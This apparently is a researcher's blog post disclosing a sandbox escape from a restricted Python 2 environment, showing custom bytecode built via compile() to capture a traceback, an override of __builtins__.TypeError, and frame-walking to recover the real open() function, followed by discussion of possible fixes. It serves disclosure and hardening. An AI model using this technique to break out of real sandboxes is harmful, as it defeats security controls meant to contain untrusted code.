That seems like a worthwhile thing to have available, to make uses like the Google App Engine more easily implemented and secured. It works (at least, the current version does) by trying to hide anything you could use from code to write to the local filesystem. You get a replacement function for file()/open() which only allows opening in read mode, and __import__(), execfile(), reload(), etc, are taken out of the builtins dictionary. So (hopefully) the user can not import anything at all.
To go further than that, tav removes the func_* attributes from the FunctionType dictionary- if you had func_closure, as an example, you would be able to inspect the closure attached to the replacement open() function and get at the real one. (My recipe on ASPN shows you one way to do that.) A few other attributes are removed from the dictionaries of default types, like gi_code on GeneratorType.
The replacement open() function is (now) carefully coded to avoid trusting any globals or the contents of the __builtins__ dictionary when it is run- otherwise, you'd be able to trick it into acting in different ways when it uses values from there.
I came up with an exploit which hinges on the continued presence of the compile() builtin in the sandbox. When you use compile(), you get a code object out. When you have a code object, you can create new code objects (using type(code_object)(arguments)). Since you can come up with arbitrary bytecode to put in a new code object, you can make the code object thus created do a few things that you can't do in normal python. The most useful one in this case is that you can get access to the traceback object from an exception without sys.exc_info() or sys.exc_traceback.
I won't go too far into details on that, except to say that when you get into an exception handler, the stack is topped with the exception object, as well as the traceback and type objects you'd get from sys.exc_info(). Roll a little custom bytecode, and you can store it off of the stack rather than throwing it away (which is what the compiler will usually do):
>>> f = type(lambda: 0)(type(compile('1', 'b', 'eval'
))(2, 2, 4, 67, 'y\x08\x00t\x00\x00\x01Wn\x09\x00\x01'
(None,), ('stuff',), ('g', 'x'), 'q', 'f', 1, ''),
globals(), None, (TypeError,))
1 0 SETUP_EXCEPT 8 (to 11)
3 LOAD_GLOBAL 0 (stuff)
8 JUMP_FORWARD 9 (to 20)
>> 11 POP_TOP
13 STORE_GLOBAL 0 (stuff)
16 JUMP_FORWARD 1 (to 20)
>> 20 LOAD_FAST 1 (x)
23 LOAD_FAST 0 (g)
26 CALL_FUNCTION 1
That function returns TypeError, because I need to get it to run underneath the replacement open() function, and the easiest way (there are others) is to overload TypeError- the only global that it references.
__builtins__.TypeError = f
I just call the replacement open() with a mode parameter of 2, so that it will load and call TypeError:
..whereupon it has kindly stored the traceback object in the global dict under the name "stuff". Traceback objects contain references to frame objects, and you can follow frame objects up the call chain, and so we can easily get to the frame containing the replacement open() function:
From that point, it's trivial to pull out the real open() function from the local variables of the frame, and use it:
That works in Python 2.4 through 2.6, and probably some earlier 2.x versions. I seriously doubt it works in 3.0, but I haven't tried, and it might be adaptable to work there.
What's the right approach to fixing this hole? I'm not sure. If tav decides to disallow compile(), I haven't yet found any other way to get at a code object, so that would plug it up as far as I know. On the other hand, it would be real nice to be able to keep compile(). Give the restricted-environment users as much power as possible without sacrificing security. If it is possible to remove f_back or f_locals or tb_frame from their respective builtin-type dictionaries, that would plug the hole, but would probably break the reporting and display of normal exception tracebacks.
Maybe Python can be made not to provide the traceback object in an exception handler's stack frame- I admit I don't even know why it does. Does it support some old, no-longer-documented syntax? That would plug up this hole without sacrificing any functionality that I know of, but there might remain some related exploits.